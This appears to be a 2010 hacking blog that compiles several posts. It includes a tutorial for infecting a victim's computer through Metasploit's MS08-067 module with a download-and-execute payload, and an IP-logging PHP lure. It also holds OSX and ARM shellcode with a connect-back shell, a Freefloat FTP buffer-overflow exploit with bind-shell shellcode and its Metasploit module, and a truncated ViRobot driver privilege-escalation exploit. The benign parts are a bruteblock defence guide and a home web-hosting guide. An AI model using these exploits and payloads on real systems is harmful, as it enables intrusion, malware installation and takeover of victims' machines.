Infect IP using METASPLOIT

Posted by oz family, Friday, December 31, 2010

Whoa, my hands have gone stiff from not writing for so long... now I'm going to post updates again, ok let's continue...

This tutorial covers how we infect someone's IP via Metasploit, so that we can plant a program, virus, worm, RAT, keylogger, or whatever you like,

ok, let's continue

Here we need two tools that probably none of you are unfamiliar with anymore,
namely
METASPLOIT
NMAP

The very first thing we do is of course look for a target.
If the target is on the local network you can use any of the IP scanner tools, that part is easy...
But what if you want to know someone's IP on the internet?

Here's just a little enlightenment:
first we make a PHP script to capture the IP address of any visitor who opens that script.

Here's the script:

Code:
<?php

// Append the visitor's remote address to ip.txt, one line per visit
$file = "ip.txt";

$ip = $_SERVER['REMOTE_ADDR'];

$handle = fopen($file, 'a');

fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "\n");

fclose($handle);
?>
After that, upload it to a free webhost and get the target to open that link.

OK, once we've got the IP, we continue by opening Metasploit.

1. First of all we have to create a database by
typing db_create in Metasploit.

2. Then we scan the target IP with nmap: type nmap in Metasploit, then type nmap -sT -sV <target ip>
Once the scan is done we'll get some information; if it includes anything about Windows 2000 (or XP SP1, SP2, SP3), that means we can infect that IP without any problem.
3. In Metasploit type use windows/smb/ms08_067_netapi
then type 'set target 0'
'show payloads'
'set payload windows/download_exec'
show options
set RHOST <target IP>

After that comes the most important part here: which program do we want to infect that IP (computer) with?
Whether we infect it with a virus, worm, RAT, keylogger, or anything else is up to you.

We type set url http://www.site.com/xxx.exe

And finally we type exploit



Bruteforce attacks on the ssh and ftp services are really annoying. Idly browsing around got me to an interesting tool that's fairly easy to use.

Bruteblock lets a system administrator block bruteforce attacks aimed at UNIX services.

How does this tool work?

By analysing the system log and then adding the attacker's IP address to an ipfw2 table, this tool can block brute-force attackers.

The IP address is then automatically deleted from that table after a preset period of time. Bruteblock also uses regular expressions to parse the log, which gives flexibility in how it's operated, so the tool can be used for almost any network service.

How to install? Just simple... follow these steps
1. Install from the ports tree:
#cd /usr/ports/security/bruteblock
#make install clean


2. Add the following lines to /etc/rc.conf so that bruteblock starts right away at boot
bruteblockd_enable="YES"
bruteblockd_table="1"

bruteblockd_flags="-s 5"

3. Edit the file /etc/syslog.conf

Change the following line:

auth.info;authpriv.info /var/log/auth.log

to
auth.info;authpriv.info |exec /usr/local/sbin/bruteblock -f /usr/local/etc/bruteblock/ssh.conf

4. Restart syslogd
#/etc/rc.d/syslogd restart

5. Start the bruteblock application with the command:
#/usr/local/etc/rc.d/bruteblockd.sh start

6. Add ipfw rules to block the IPs that bruteblock puts into the table
#ipfw add 400 deny ip from me to table\(1\)
#ipfw add 410 deny ip from table\(1\) to me


7. If you want to change the bruteblock settings for each protected service, say I want to change the settings for ssh in the file /usr/local/etc/bruteblock/ssh.conf,

pay attention to the following points

regexp = sshd.*Illegal user \S+ from (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})
regexp1 = sshd.*Failed password for (?:illegal user )?\S+ from (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})

# Number of failed login attempts within time before we block
max_count = 4

# Time in seconds in which all failed login attempts must occur
within_time = 60

# Time in seconds to block ip in firewall
# 10 minutes
reset_ip = 600

# IPFW table number to add "bad" hosts
ipfw2_table_no = 1

You can just as well apply it to other services, ftp for example. You only need to change the regexp part; just adapt it to that service's log format.
Easy, right?...
Looking forward to your comments here..
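What those settings amount to, as an added Python sketch (not bruteblock's own code): the two regexps above are run over a constructed auth.log excerpt, each address's failures are counted in a sliding window of within_time seconds, and an address that reaches max_count inside that window is held for reset_ip seconds and then released. The host name, addresses and log lines are made up; the "ipfw table ... add/delete" strings are the equivalent manual table changes, not output of bruteblock itself.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Settings mirrored from the ssh.conf excerpt above.
MAX_COUNT = 4        # failed attempts inside the window before we block
WITHIN_TIME = 60     # sliding window length, seconds
RESET_IP = 600       # how long an address stays blocked, seconds
IPFW_TABLE_NO = 1    # ipfw2_table_no

IPV4 = r"(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})"
REGEXPS = [
    re.compile(r"sshd.*Illegal user \S+ from " + IPV4),
    re.compile(r"sshd.*Failed password for (?:illegal user )?\S+ from " + IPV4),
]
# BSD syslog prefix "Nov  6 10:15:01 host ..."; the year is not logged.
SYSLOG_TS = re.compile(r"^(\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) ")


def parse_timestamp(line, year=2010):
    # Returns None for lines without a syslog prefix.
    m = SYSLOG_TS.match(line)
    if m is None:
        return None
    return datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")


def extract_ip(line):
    # The captured group of the first matching regexp is the offending address.
    for rx in REGEXPS:
        m = rx.search(line)
        if m:
            return m.group(1)
    return None


class BruteBlocker:
    """Per-IP sliding-window failure counter with timed expiry of blocks."""

    def __init__(self, max_count=MAX_COUNT, within_time=WITHIN_TIME, reset_ip=RESET_IP):
        self.max_count = max_count
        self.within_time = timedelta(seconds=within_time)
        self.reset_ip = timedelta(seconds=reset_ip)
        self.failures = defaultdict(deque)  # ip -> timestamps of recent failures
        self.blocked = {}                   # ip -> time its block expires
        self.commands = []                  # equivalent ipfw table changes, in order

    def expire(self, now):
        """Release addresses whose reset_ip period has elapsed."""
        for ip, until in list(self.blocked.items()):
            if now >= until:
                del self.blocked[ip]
                self.commands.append(f"ipfw table {IPFW_TABLE_NO} delete {ip}")

    def feed(self, line):
        """Process one log line; return the IP if this line triggers a block."""
        now = parse_timestamp(line)
        if now is None:
            return None
        self.expire(now)
        ip = extract_ip(line)
        if ip is None or ip in self.blocked:
            return None
        window = self.failures[ip]
        window.append(now)
        while now - window[0] > self.within_time:  # forget failures outside the window
            window.popleft()
        if len(window) < self.max_count:
            return None
        self.blocked[ip] = now + self.reset_ip
        window.clear()
        self.commands.append(f"ipfw table {IPFW_TABLE_NO} add {ip}")
        return ip


# Constructed auth.log excerpt: a fast attacker (10.0.0.5), a slow one (172.16.0.9)
# that never has 4 failures inside 60 s, and one legitimate login.
SAMPLE_LOG = """\
Nov  6 10:15:01 bsdhost sshd[2101]: Illegal user admin from 10.0.0.5
Nov  6 10:15:03 bsdhost sshd[2101]: Failed password for illegal user admin from 10.0.0.5 port 51022 ssh2
Nov  6 10:15:10 bsdhost sshd[2105]: Failed password for root from 10.0.0.5 port 51030 ssh2
Nov  6 10:15:12 bsdhost sshd[2109]: Accepted publickey for ozfamily from 192.168.1.20 port 50011 ssh2
Nov  6 10:15:20 bsdhost sshd[2110]: Failed password for root from 10.0.0.5 port 51040 ssh2
Nov  6 10:15:30 bsdhost sshd[2111]: Failed password for root from 10.0.0.5 port 51050 ssh2
Nov  6 10:17:00 bsdhost sshd[2120]: Failed password for root from 172.16.0.9 port 40001 ssh2
Nov  6 10:17:30 bsdhost sshd[2121]: Failed password for root from 172.16.0.9 port 40002 ssh2
Nov  6 10:18:30 bsdhost sshd[2122]: Failed password for root from 172.16.0.9 port 40003 ssh2
Nov  6 10:19:00 bsdhost sshd[2123]: Failed password for root from 172.16.0.9 port 40004 ssh2
Nov  6 10:25:21 bsdhost sshd[2130]: Failed password for root from 10.0.0.5 port 51060 ssh2
"""


def run_demo(log_text=SAMPLE_LOG):
    """Feed every line through a fresh BruteBlocker; return it and the blocks made."""
    blocker = BruteBlocker()
    triggered = []
    for line in log_text.splitlines():
        ip = blocker.feed(line)
        if ip:
            triggered.append((ip, parse_timestamp(line)))
    return blocker, triggered
```

Running run_demo() on the sample puts 10.0.0.5 in the table at its fourth failure (10:15:20), releases it 600 seconds later, and never blocks 172.16.0.9 because its failures are spread too thinly for the 60-second window.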


DOWNLOAD
http://zeestuff.wordpress.com/2010/11/06/tangkis-serangan-bruteforce-pada-freebsd-unix/#more-74

source : tecon-crew

    Crack Wifi

    Posted by oz family, Saturday, December 25, 2010


    Wireless security auditing application
    This is a wireless security auditing application written in Python that uses python-qt4. It uses the aircrack-ng suite of tools.
    It should work on any version of Linux running the following:
    Requirements:
    python
    python-qt4
    macchanger
    aircrack-ng
    xterm
    For Slax distributions, download the zipped module package from the download section and follow the instructions in the "README" file.
    To install, simply run the following command in a terminal after changing directory to the path where the downloaded package is:
    dpkg -i Fern-Wifi-Cracker_1.1_all.deb
    The software icon can be found in the application menu of the GNOME desktop interface.
    The icon can also be found at /usr/share/applications for KDE and also GNOME:
    there you find "Fern_Wifi_Cracker.desktop"
    Images:
    Click the refresh button to display monitor interfaces:



    Decrypted keys are automatically added to the database after a successful attack, but you can also add keys manually.
    The database file can be found at /usr/local/bin/Fern-Wifi-Cracker/key-Database/Database.db


    NOTE: It's normal for your VGA screen to adjust and return while the application is initializing. This is because the software has to switch to a suitable resolution before running; otherwise the text in the application overlaps or certain text becomes invisible.

    Everyone... welcome back with me... marvellous a.k.a. Liyan oz

    Probably some of you already know this, but many don't... so this tutorial is for the second lot of people, i.e. those who don't know how to use their own personal desktop machine to host a website that can be accessed from anywhere round the world.

    I've been using it for around a month now and thought, why not share it over here ;) ..

    I learnt this method from a friend who has nothing to do with HF and made the complete tutorial myself, which took me a hell of a lot of time... so no part of this tutorial has been leeched from anyone, and no one can say that it's theirs just because they use this method themselves... because 10000s of people round the globe are using it. I'm just trying to help the newbies, and if I make any kind of error, don't flame me.

    Requirements:
    To start off you'll just need a PC with Windows loaded on it. Pretty much works on all Windows versions :) ..
    Nothing more is required :D

    Step 1 :

    Go to DynDNS. Click on Sign In.
    It should look something like this:
    http://img203.imageshack.us/img203/1637/89403494.png


    Step 2 :

    Then click on Create an Account. You should be redirected to the registration page, which looks like this:
    http://img263.imageshack.us/img263/572/18892149.png

    Fill in all the necessary details as required. After filling it in, the page should look something like this:
    http://img135.imageshack.us/img135/5926/46115337.png

    Then click on Create Account and you should be redirected to a page showing that the account has been created, which looks like this:
    http://img41.imageshack.us/img41/7326/92990336.png


    Step 3 :

    Go to the email id which you provided during registration. In my case the email went to the spam box.
    Open the mail from DynDNS.
    It looks something like this:
    http://img8.imageshack.us/img8/3893/66820418.png
    Click on the confirmation link. On clicking it you will be redirected to the DynDNS site, where it asks for password confirmation. Enter the password you entered during registration and you will be shown a page stating that the account is activated.
    http://img28.imageshack.us/img28/6110/28900678.png
    http://img828.imageshack.us/img828/388/97742084.png


    Step 4 :

    Click on Add Hostname.
    This takes you to the next page.
    Enter any hostname of your choice and enter your current machine's IP address in the specified slot.
    After filling it in, it should look something like this:
    http://img153.imageshack.us/img153/6231/75921400.png
    Now click on Add to Cart at the bottom of the page.
    This takes you to a page: http://img135.imageshack.us/img135/2263/63344696.png
    Click Next.
    It takes you to a price summary page, which looks like this:
    http://img189.imageshack.us/img189/5227/30244360.png
    Click Activate Services on the page, which takes you to this page:
    http://img715.imageshack.us/img715/6793/28850505.png


    Step 5 :

    Now click on Support at the top of the page and then on Update Client on the left-hand side.
    This takes you to this page: http://img715.imageshack.us/img715/3523/78946032.png

    Now download the DynDNS Updater onto your local machine.
    http://img840.imageshack.us/img840/7889/46189333.png


    Step 6 :

    Now it's time for installation.
    When you open the installer file it looks something like this: -------image 16
    Keep clicking Next... http://img812.imageshack.us/img812/3707/63194612.png
    When the installation ends, you get this: http://img222.imageshack.us/img222/4535/82718638.png
    Click Finish.

    When it opens, you see this: http://img263.imageshack.us/img263/5320/18043052.png
    Select the DNS host which we created a while back, click Apply and then click OK.

    On clicking OK... you can see this: http://img401.imageshack.us/img401/2807/54145072.png
    Cool... so your IP is in sync with the hostname.


    Step 7 :

    Now my machine does not have the Apache server installed, so I'll go to http://httpd.apache.org
    The page looks something like this: http://img256.imageshack.us/img256/6906/18788668.png

    Now click on the "from a mirror" link on the left-hand side. This takes you to the downloads section, which looks like this:
    http://img827.imageshack.us/img827/7315/45156565.png

    Now you can either choose the latest version available or the most stable version available in the downloads section.
    I'll choose the most stable version, i.e. 2.2.17.
    So, click on the Win32 Binary including OpenSSL and download it.

    Step 8 :

    Then launch the Apache installation. The main screen when you open the download is: http://img222.imageshack.us/img222/547/92653498.png

    When you click Next you get a screen like this: http://img189.imageshack.us/img189/1231/42707644.png which asks you for some details.

    The details have to be filled in the same way we entered them last time for DynDNS. Enter your email id as the admin email id.

    The filled-in details will look like this: http://img404.imageshack.us/img404/9084/34613609.png

    Click Next. Then you get this screen: http://img148.imageshack.us/img148/3688/76736775.png

    Click Finish.

    At this point I want to say something... you're DONE doing all the required settings. Yipee


    Step 9 :

    Now, to test whether all the settings are proper and we can view our local website on the WWW, we open our browser and enter the host address of the DynDNS hostname which we set up earlier.

    It looks something like this.
    http://img525.imageshack.us/img525/8392/91348770.png

    And it says.... It works!! .... wow....
    That means we are done setting up our website using our local PC, and this website can be viewed from any place round the world.

    LolZZ.. and for the others who feel that this is fake and I'm just viewing it because it's hosted on my local machine and I'm accessing it via localhost, let's use any online proxy site and visit the link to see if we can view the website.

    I choose our own... hidemyass.com... The homepage looks like this: http://img151.imageshack.us/img151/2456/66840544.png

    When I open the pre-specified URL in the online proxy, the site is visited via an IP different from ours, i.e. similar to the way a different machine would view the URL... and what we see is... http://img528.imageshack.us/img528/6531/48179935.png ... means... OUR HARD WORK PAID OFF AND OUR WEBSITE IS HOSTED ONLINE, AND THAT TOO FREE OF COST FOR AN UNLIMITED PERIOD OF TIME


    Step 10 :

    For others who are new to this and don't know where to put the files to host the website: put your own "index" page and the other files at the location C:\Program Files\Apache Software Foundation\Apache2.2\htdocs ... just replace the index file and you can view the new site which you will be uploading. The place where you upload your new index file and the other files looks like this.. http://img822.imageshack.us/img822/4714/66616122.png


    It took me a lot of time to create this tutorial, especially to set up the whole thing again and take screenshots of everything. So, haters please :hi: stay off ...

    Hope this tutorial was helpful for you all ... Kindly comment and let me know whether you like it or not.

    OSX/Intel - setuid shell x86_64 - 51 bytes

    Posted by oz family, Tuesday, December 21, 2010

    ==========================================
    OSX/Intel - setuid shell x86_64 - 51 bytes
    ==========================================
    
    /*
     * Title:     OSX/Intel - setuid shell x86_64 - 51 bytes
     * Date:      2010-11-25
     * Tested on: Mac OS X 10.6.5 - Darwin Kernel Version 10.5.0
     * Author:    Dustin Schultz - twitter: @thexploit
     *
     * http://thexploit.com
     *
     * BITS 64
     *
     * section .text
     * global start
     *
     * start:
     * a:
     *  mov r8b, 0x02          ; Unix class system calls = 2
     *  shl r8, 24             ; shift left 24 to the upper order bits
     *  or r8, 0x17            ; setuid = 23, or with class = 0x2000017
     *  xor edi, edi           ; zero out edi
     *  mov rax, r8            ; syscall number in rax
     *  syscall                ; invoke kernel
     *  jmp short c            ; jump to c
     * b:
     *  pop rdi                ; pop ret addr which = addr of /bin/sh
     *  add r8, 0x24           ; execve = 59, 0x24+r8=0x200003b
     *  mov rax, r8            ; syscall number in rax
     *  xor rdx, rdx           ; zero out rdx
     *  push rdx               ; null terminate rdi, pushed backwards
     *  push rdi               ; push rdi = pointer to /bin/sh
     *  mov rsi, rsp           ; pointer to null terminated /bin/sh string
     *  syscall                ; invoke the kernel
     * c:
     *  call b                 ; call b, push ret of /bin/sh
     *  db '/bin//sh'          ; /bin/sh string
    */
     
     
    #include <stdio.h>
    #include <sys/mman.h>
    #include <string.h>
    #include <stdlib.h>
     
    int (*sc)();
     
    char shellcode[] =
    "\x41\xb0\x02\x49\xc1\xe0\x18\x49\x83\xc8\x17\x31\xff\x4c\x89\xc0"
    "\x0f\x05\xeb\x12\x5f\x49\x83\xc0\x24\x4c\x89\xc0\x48\x31\xd2\x52"
    "\x57\x48\x89\xe6\x0f\x05\xe8\xe9\xff\xff\xff\x2f\x62\x69\x6e\x2f"
    "\x2f\x73\x68";
     
    int main(int argc, char **argv) {
     
        void *ptr = mmap(0, 0x33, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON
                | MAP_PRIVATE, -1, 0);
     
        if (ptr == MAP_FAILED) {
            perror("mmap");
            exit(-1);
        }
     
        memcpy(ptr, shellcode, sizeof(shellcode));
        sc = ptr;
     
        sc();
     
        return 0;
    }
    
    
    # oz

    ==============================================
    linux/ARM - Bind Connect UDP Port 68 Shellcode
    ==============================================
    
    /*
     * Title: arm-bind-connect-udp
     * Brief: Bind to port 68 on any local address and plug a udp shell
     *        onto port 67 on 192.168.0.1
     * Author: Daniel Godas-Lopez <gmail account dgodas>
     */
     
    .if 1
        /*
          close(3), close(4), ..., close(1024)
         */
     
        mov %r1, $1024
    1:  mov %r0, %r1
        svc 0x00900006
        subs %r1, %r1, $1
        subs %r2, %r1, $3
        bpl 1b
    .endif
     
        /*
          soc_des = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
         */
     
        mov %r0, $2     /* AF_INET */
        mov %r1, $2     /* SOCK_DGRAM */
        mov %r2, $17        /* IPPROTO_UDP */
        push {%r0, %r1, %r2}
        mov %r0, $1     /* socket */
        mov %r1, %sp
        svc 0x00900066
        add %sp, %sp, $12
     
        mov %r6, %r0        /* r6 = soc_des */
     
        /*
          bind(soc_des, (struct sockaddr*) &serv_addr, sizeof(serv_addr));
         */
     
    .if 0 /* r0 == r6 already */
        mov %r0, %r6        /* soc_des */
    .endif
     
        mov %r1, $0x44000000
        add %r1, $2     /* port = 68, family = 2 (AF_INET) */
        sub %r2, %r2, %r2   /* addr = 0.0.0.0 */
        push {%r1, %r2}
        mov %r1, %sp        /* pointer to sockaddr_in */
        mov %r2, $16        /* sizeof(struct sockaddr_in) */
         
        push {%r0, %r1, %r2}
        mov %r0, $2     /* bind */
        mov %r1, %sp
        svc 0x00900066
        add %sp, %sp, $20
     
        /*
          connect(soc_des, (struct sockaddr*) &cli_addr, sizeof(cli_addr));
         */
     
        mov %r0, %r6        /* soc_des */
     
        mov %r1, $0x43000000
        add %r1, $2     /* port = 67, family = 2 (AF_INET) */
        mov %r2, $0x1000000
        add %r2, %r2, $0xa800
        add %r2, $0xc0      /* addr = 192.168.0.1 */
        push {%r1, %r2}
        mov %r1, %sp        /* pointer to sockaddr_in */
        mov %r2, $16        /* sizeof(struct sockaddr_in) */
     
        push {%r0, %r1, %r2}
        mov %r0, $3     /* connect */
        mov %r1, %sp
        svc 0x00900066
        add %sp, %sp, $20
     
        /*
          dup2(soc_cli,0);
          dup2(soc_cli,1);
          dup2(soc_cli,2);
         */
     
        mov %r1, $2
    1:  mov %r0, %r6
        svc 0x0090003f
        subs %r1, %r1, $1
        bpl 1b
     
        /*
          execve("/bin/sh", parms, env);
         */
     
        sub %r1, %sp, $4    /* argv[0] = "sh" */
        sub %r2, %r2, %r2   /* argv[1] = 0x00000000 */
        mov %r3, $0x2f
        mov %r7, $0x62
        add %r3, %r7, lsl $8
        mov %r7, $0x69
        add %r3, %r7, lsl $16
        mov %r7, $0x6e
        add %r3, %r7, lsl $24   /* '/'  'b'  'i'  'n'  */
        mov %r4, $'/'
        mov %r7, $'s'
        add %r4, %r7, lsl $8
        mov %r7, $'h'
        add %r4, %r7, lsl $16   /* '/'  's'  'h'  0x00 */
        mov %r5, $'s'
        mov %r7, $'h'
        add %r5, %r7, lsl $8    /* 's'  'h'  0x00 0x00 */
     
        push {%r1, %r2, %r3, %r4, %r5}
     
        add %r0, %sp, $8    /* filename ptr */
        add %r1, %sp, $0    /* argv ptr */
        add %r2, %sp, $4    /* env ptr */
     
        svc 0x0090000b
    
    
    # oz

    =======================================================
    Freefloat FTP Server Buffer Overflow Vulnerability 0day
    =======================================================
    
    # Exploit Title: Freefloat FTP Server Buffer Overflow Vulnerability
    # Date: 12/05/2010
    # Author: 0v3r
    # Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
    # Tested on: Windows XP SP3 EN
    # CVE: N/A
     
    #!/usr/bin/python
     
    import socket
    import sys
     
    def usage():
     
            print "usage  : ./freefloatftp.py <victim_ip>  <victim_port>"
            print "example: ./freefloatftp.py 192.168.1.100 21"
     
    #Bind Shell shellcode port 4444
    shellcode = ("\x31\xc9\xdb\xcd\xbb\xb3\x93\x96\x9d\xb1\x56\xd9\x74\x24\xf4"
    "\x5a\x31\x5a\x17\x83\xea\xfc\x03\x5a\x13\x51\x66\x6a\x75\x1c"
    "\x89\x93\x86\x7e\x03\x76\xb7\xac\x77\xf2\xea\x60\xf3\x56\x07"
    "\x0b\x51\x43\x9c\x79\x7e\x64\x15\x37\x58\x4b\xa6\xf6\x64\x07"
    "\x64\x99\x18\x5a\xb9\x79\x20\x95\xcc\x78\x65\xc8\x3f\x28\x3e"
    "\x86\x92\xdc\x4b\xda\x2e\xdd\x9b\x50\x0e\xa5\x9e\xa7\xfb\x1f"
    "\xa0\xf7\x54\x14\xea\xef\xdf\x72\xcb\x0e\x33\x61\x37\x58\x38"
    "\x51\xc3\x5b\xe8\xa8\x2c\x6a\xd4\x66\x13\x42\xd9\x77\x53\x65"
    "\x02\x02\xaf\x95\xbf\x14\x74\xe7\x1b\x91\x69\x4f\xef\x01\x4a"
    "\x71\x3c\xd7\x19\x7d\x89\x9c\x46\x62\x0c\x71\xfd\x9e\x85\x74"
    "\xd2\x16\xdd\x52\xf6\x73\x85\xfb\xaf\xd9\x68\x04\xaf\x86\xd5"
    "\xa0\xbb\x25\x01\xd2\xe1\x21\xe6\xe8\x19\xb2\x60\x7b\x69\x80"
    "\x2f\xd7\xe5\xa8\xb8\xf1\xf2\xcf\x92\x45\x6c\x2e\x1d\xb5\xa4"
    "\xf5\x49\xe5\xde\xdc\xf1\x6e\x1f\xe0\x27\x20\x4f\x4e\x98\x80"
    "\x3f\x2e\x48\x68\x2a\xa1\xb7\x88\x55\x6b\xce\x8f\x9b\x4f\x82"
    "\x67\xde\x6f\x34\x2b\x57\x89\x5c\xc3\x31\x01\xc9\x21\x66\x9a"
    "\x6e\x5a\x4c\xb6\x27\xcc\xd8\xd0\xf0\xf3\xd8\xf6\x52\x58\x70"
    "\x91\x20\xb2\x45\x80\x36\x9f\xed\xcb\x0e\x77\x67\xa2\xdd\xe6"
    "\x78\xef\xb6\x8b\xeb\x74\x47\xc2\x17\x23\x10\x83\xe6\x3a\xf4"
    "\x39\x50\x95\xeb\xc0\x04\xde\xa8\x1e\xf5\xe1\x31\xd3\x41\xc6"
    "\x21\x2d\x49\x42\x16\xe1\x1c\x1c\xc0\x47\xf7\xee\xba\x11\xa4"
    "\xb8\x2a\xe4\x86\x7a\x2d\xe9\xc2\x0c\xd1\x5b\xbb\x48\xed\x53"
    "\x2b\x5d\x96\x8e\xcb\xa2\x4d\x0b\xfb\xe8\xcc\x3d\x94\xb4\x84"
    "\x7c\xf9\x46\x73\x42\x04\xc5\x76\x3a\xf3\xd5\xf2\x3f\xbf\x51"
    "\xee\x4d\xd0\x37\x10\xe2\xd1\x1d\x1a")
     
     
    junk1  = "\x41" * 230
    eip    = "\x53\x93\x42\x7E"  #7E429353 JMP ESP
    nops   = "\x90" * 16
    junk2  = "\x43" * (1000 - len(junk1 + eip + nops + shellcode))
     
    buff   = junk1 + eip + nops + shellcode + junk2
     
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     
     
    print "\n" 
    print "----------------------------------------------------------------"
    print "|      Freefloat FTP Server Buffer Overflow Vulnerability      |"
    print "----------------------------------------------------------------"
    print "\n"
     
     
    if len(sys.argv) != 3:
        usage()
        sys.exit()
     
    ip   = sys.argv[1]
    port = sys.argv[2]
     
    try:
        print("[-] Connecting to " + ip + " on port " + port + "\n")
        s.connect((ip,int(port)))
        data = s.recv(1024)
        print("[-] Sending exploit...")
        s.send('USER ' + buff + '\r\n')
        s.close()
        print("[-] Exploit successfully sent...")
        print("[-] Connect to " + ip + " on port 4444")
    except:
        print("[-] Connection error...")
        print("[-] Check if victim is up.")
    

    ===================================================
    Freefloat FTP Server Buffer Overflow Exploit (Meta)
    ===================================================
    
    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##
     
    require 'msf/core'
     
     
    class Metasploit3 < Msf::Exploit::Remote
        Rank = NormalRanking
     
        include Msf::Exploit::Remote::Ftp
     
        def initialize(info = {})
            super(update_info(info,
                'Name'           => 'Freefloat FTP <= 1.00 Stack Buffer Overflow',
                'Description'    => %q{
                    This module exploits a vulnerability in Freefloat FTP service version 1.00.
                    This module uses the USER command to trigger the overflow.
                },
                'Author'         =>
                    [
                        '0v3r',                 # original version
                        'Muhamad Fadzil Ramli'  # metasploit module
                    ],
                'License'        => MSF_LICENSE,
                'Version'        => '$Revision: $',
                'References'     =>
                    [
                        [ 'EDB', '15689' ],
                        [ 'URL', 'http://www.freefloat.com/software/freefloatftpserver.zip' ]
                    ],
                'DefaultOptions' =>
                    {
                        'EXITFUNC' => 'process',
                        'RPORT'    => 21
                    },
                'Privileged'     => false,
                'Payload'        =>
                    {
                        'Space'    => 512,
                        'BadChars' => "\x00\x0a\x0d\xff\x20",
                        'StackAdjustment' => -3500,
                        'DisableNops' => true
                    },
                'Platform'       => 'win',
                'Targets'        =>
                    [
                        [ 'Windows XP SP3 (EN)', { 'Ret' => 0x5AD86AEB } ], # push esp, ret [uxtheme.dll]
                    ],
                'DisclosureDate' => 'December 5 2010',
                'DefaultTarget'  => 0))
            deregister_options('FTPUSER','FTPPASS')
        end
     
        def check
            connect
            disconnect
            if (banner =~ /FreeFloat Ftp Server \(Version 1\.00\)/)
                return Exploit::CheckCode::Vulnerable
            end
            return Exploit::CheckCode::Safe
        end
     
        def exploit
     
            connect
            print_status("Trying target #{target.name}...")
     
            buf =  rand_text_alpha(230)
            buf << [target.ret].pack('V')
            buf << make_nops(16)
            buf << payload.encoded
            #buf    << rand_text_alpha(1000 - buf.length)
     
            #send_cmd( ['USER',buf],false )
            send_user(buf)
     
            handler
            disconnect
        end
    end

    ====================================================================
    ViRobot Desktop 5.5 and Server 3.5 <=2008.8.1.1 Privilege Escalation
    ====================================================================
    
    VULNERABLE PRODUCTS
    Hauri ViRobot Desktop 5.5 and below
    Hauri ViRobot Server 3.5 and below
     
    DETAILS:
    VRsecos.sys creates a device called "VRsecos" and handles DeviceIoControl code 0x8307202c, which uses the function "strcpy" to copy memory from the IRP SystemBuffer into the driver's data area; this can overwrite critical kernel object memory in vrsecos.sys's data area.
     
     
    EXPLOIT CODE: (Tested on Windows XP SP3, only for vrsecos.sys == 2008.8.1.1)
    // virobot0day.cpp : Defines the entry point for the console application.
    //
    #include "stdafx.h"
    #include "windows.h"
    #include "malloc.h"
    typedef struct X_DISPATCHER_HEADER{
        UCHAR Type ;
        UCHAR Absolute ;
        UCHAR Size ;
        UCHAR Inserted ;
        ULONG SignalState ;
        LIST_ENTRY WaitListHead ;
    }X_DISPATCHER_HEADER , *PX_DISPATCHER_HEADER;
    typedef struct X_KMUTANT{
        X_DISPATCHER_HEADER Header ;
        LIST_ENTRY MutantListEntry ;
        PVOID OwnerThread ;
        UCHAR Abandoned ;
        UCHAR ApcDisable ;
    }X_KMUTANT , *PX_KMUTANT;
    PVOID GetInfoTable(ULONG ATableType)
    {
        ULONG mSize = 0x4000;
        PVOID mPtr = NULL;
        LONG status;
        HMODULE hlib = GetModuleHandle("ntdll.dll");
        PVOID pZwQuerySystemInformation = GetProcAddress(hlib , "ZwQuerySystemInformation");

        do
        {
            mPtr = malloc(mSize);
            if (mPtr)
            {
                __asm
                {
                    push 0
                    push mSize
                    push mPtr
                    push ATableType
                    call pZwQuerySystemInformation
                    mov status , eax
                }
            }
            else
            {
                return NULL;
            }
            if (status == 0xc0000004)
            {
                free(mPtr);
                mSize = mSize * 2;
            }
        } while (status == 0xc0000004);
        if (status == 0)
        {
            return mPtr;
        }
        free(mPtr);
        return NULL;
    }
    typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {
        USHORT UniqueProcessId;
        USHORT CreatorBackTraceIndex;
        UCHAR ObjectTypeIndex;
        UCHAR HandleAttributes;
        USHORT HandleValue;
        PVOID Object;
        ULONG GrantedAccess;
    } SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO;
    typedef struct _SYSTEM_HANDLE_INFORMATION {
        ULONG NumberOfHandles;
        SYSTEM_HANDLE_TABLE_ENTRY_INFO Information[ 1 ];
    } SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
    enum { SystemModuleInformation = 11,
    SystemHandleInformation = 16 };
    typedef struct {
        ULONG   Unknown1;
        ULONG   Unknown2;
        PVOID   Base;
        ULONG   Size;
        ULONG   Flags;
        USHORT Index;
        USHORT NameLength;
        USHORT LoadCount;
        USHORT PathLength;
        CHAR    ImageName[256];
    } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
    typedef struct {
        ULONG   Count;
        SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
    } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
    typedef VOID (WINAPI *PINBV_ACQUIRE_DISPLAY_OWNERSHIP)(VOID);
    typedef BOOLEAN (WINAPI *PINBV_RESET_DISPLAY)(VOID);
    typedef VOID (WINAPI *PINBV_SOLID_COLOR_FILL)(
      ULONG x1,
      ULONG y1,
      ULONG x2,
      ULONG y2,
      ULONG color
        );
    typedef ULONG (WINAPI *PINBV_SET_TEXT_COLOR)(
      ULONG Color
        );
    typedef
    VOID
    (*INBV_DISPLAY_STRING_FILTER)(
      PUCHAR *Str
        );
    typedef VOID (WINAPI *PINBV_INSTALL_DISPLAY_STRING_FILTER)(
        INBV_DISPLAY_STRING_FILTER DisplayStringFilter
        );
    typedef BOOLEAN (WINAPI *PINBV_ENABLE_DISPLAY_STRING)(
        BOOLEAN bEnable
        );
    typedef VOID (WINAPI *PINVB_SET_SCROLL_REGION)(
        ULONG x1,
        ULONG y1,
        ULONG x2,
        ULONG y2
        );
